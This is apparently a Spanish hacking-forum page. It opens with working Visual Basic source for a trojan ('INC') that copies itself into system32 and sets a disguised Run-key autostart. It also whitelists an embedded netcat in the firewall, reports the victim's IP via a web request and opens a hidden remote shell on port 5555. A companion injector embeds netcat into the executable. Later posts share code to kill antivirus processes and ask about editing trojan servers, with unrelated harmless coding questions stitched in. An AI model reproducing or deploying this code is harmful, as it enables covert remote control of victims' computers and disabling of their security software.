Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Const REG_SZ = 1
Public Const HKLM = &H80000002

Dim Car As String * 128, DirSystem As String, KeyFirewall As String, KeyRun As String, UrlPhp As String

Function RegistrySetValueData(MasterKey, Key, Value, ValueData)
Dim nBufferKey As Long
RegOpenKey MasterKey, Key, nBufferKey
RegSetValueEx nBufferKey, Value, 0, REG_SZ, ValueData, Len(ValueData)
End Function

Sub Main()
On Error Resume Next
DirSystem = RTrim$(LCase$(Left$(Car, GetSystemDirectory(Car, "128"))))
DirWindows = RTrim$(LCase$(Left$(Car, GetWindowsDirectory(Car, "128"))))
UrlPhp = "http://127.0.0.1"
KeyFirewall = "SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
KeyRun = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

FileCopy App.Path & "\" & App.EXEName & ".exe", DirSystem & "\inc.exe"
RegistrySetValueData HKLM, KeyFirewall, DirSystem & "\nc.exe", DirSystem & "\nc.exe:*:Enabled:nc"
RegistrySetValueData HKLM, KeyRun, "NvCpIDaemon", DirSystem & "\inc.exe"

If Len(Dir(DirSystem & "\nc.exe")) = 0 Then
Dim Str1 As String, Str2 As String, NewFile As String, AllFile As String

Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
    AllFile = Space(LOF(1))
        Get #1, , AllFile
Close #1

Str1 = InStrRev(AllFile, "€ø§ø", -1)
Str2 = InStrRev(AllFile, "ø§ø€", -1)
NewFile = Trim(Mid$(AllFile, Str1 + 4, Str2 - Str1 - 4))


Open DirSystem & "\nc.exe" For Binary As #2
        Put #2, , NewFile
Close #1
End If

Call ShellExecute(hwnd, "Open", ("iexplore.exe"), UrlPhp, vbNullString, 0)
Shell "cmd.exe /c nc -L -p 5555 -e cmd.exe", vbHide

End Sub


2º Compilamos INC.bas y lo guardamos en "C:\inc.exe".



Inyector.bas

Código [Seleccionar] Expandir


' Inyector by YeIk0s

Option Explicit
Const signo1 = "€ø§ø"
Const signo2 = "ø§ø€"
Dim DirNC As String, DirINC As String, size As String * 1, i As Long

Sub Main()

DirNC = "C:\nc.exe" ' NetCat original
DirINC = "C:\inc.exe" ' Archivo donde inyectaremos el NC

Open DirNC For Binary As #1
   Open DirINC For Binary As #2
        Put #2, LOF(2) + 1, signo1
        For i = 1 To FileLen(DirNC)
            Get #1, i, size
            Put #2, LOF(2) + 1, size
        Next
        Put #2, LOF(2) + 1, signo2
    Close #2
Close #1
End Sub

3º Compilamos Inyector.bas y lo ejecutamos.



Ya tenemos listo nuestro INC, al ejecutarlo se autocopia asi mismo al directorio system32, añade al registro una clave para que no detecte el firewall de Windows XP la conexión saliente del netcat, se inicia automáticamente al incio del sistema (regedit), luego extra el NC del propio archivo y lo extrae en el directorio system32, por ultimo hace una conexión HTTP (iexplorer) hacia X página web para averiguar la IP de la victima y lanza la shell del NC de forma oculta mediante el cmd.

Estoy intentando realizar una búsqueda de archivos de todas las unidades disponibles escalando a su vez todos los directorios, pero solo consigo realizar un listado de las unidades, luego no se como hacer para id metiendome directorio a directorio, a ver si me pueden ayudar.

Código [Seleccionar] Expandir


Private Sub Command1_Click()
KillProcess ("aplicacion.exe")
End Sub


Public Sub KillProcess(ByVal processName As String)
On Error GoTo ErrHandler
Dim oWMI
Dim ret
Dim sService
Dim oWMIServices
Dim oWMIService
Dim oServices
Dim oService
Dim servicename
Set oWMI = GetObject("winmgmts:")
Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices

servicename = LCase(Trim(CStr(oService.Name) & ""))

If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
ret = oService.Terminate
End If

Next

Set oServices = Nothing
Set oWMI = Nothing


ErrHandler:
Err.Clear
End Sub

Para cerrar procesos que no sean para la propia seguridad del PC funcionana correctamente. He intentado cerrar el Kaspersky Anti-Virus Personal Pro 5.0 (KAV.exe) y lo cierra correctamente, he probado con el Panda y nada, podriais hacer un chequeo con vuestros antivirus/cortafuegos y comunicadme si funciona correctamente?

Puesto que con las API´s se puede saber la versión del IE, se podrá saber también en que carpeta está alojado? de no ser posible se podria saber el directorio de Archivos de programas?

Supongamos que tengo una cadena con el valor "primeracadena trece casa adolescente", ¿cómo podría despejar en esa misma cadena las 4 palabras que están separadas por espacios ( chr(32) ) ?

¿Cómo puedo desplazar un form lentamente? Como en el MSN messenger cuando alguien inicia sesión o recives un correo electrónico.

Qué puedo hacer para editar un .exe ya compilado, como en los edits servers de los troyanos, gracias.

Resulta que tengo este script:


<?php
$dir = opendir(".");
while ($file = readdir($dir)) {
  $extension = explode(".",$file);
$extension = $extension[1];
if($file != "." && $file != ".." && $extension != "php") {
echo $file."<br>";
}
}
closedir($dir);
?>


El cual muetra la lista de archivos del directorio actual exceptuando el formato PHP. La lista se ordena con forme se van subiendo los archivos, es decir, si primero subo el archivo 1.gif y luego subo otro llamado 2.gif me saldria así:
1.gif
2.gif
Y yo quiero ordenarlo por novedad (o modificado), si primero subo el archivo 1.gif y luego el 2.gif, que quede así:
2.gif
1.gif

¿Alguna idea?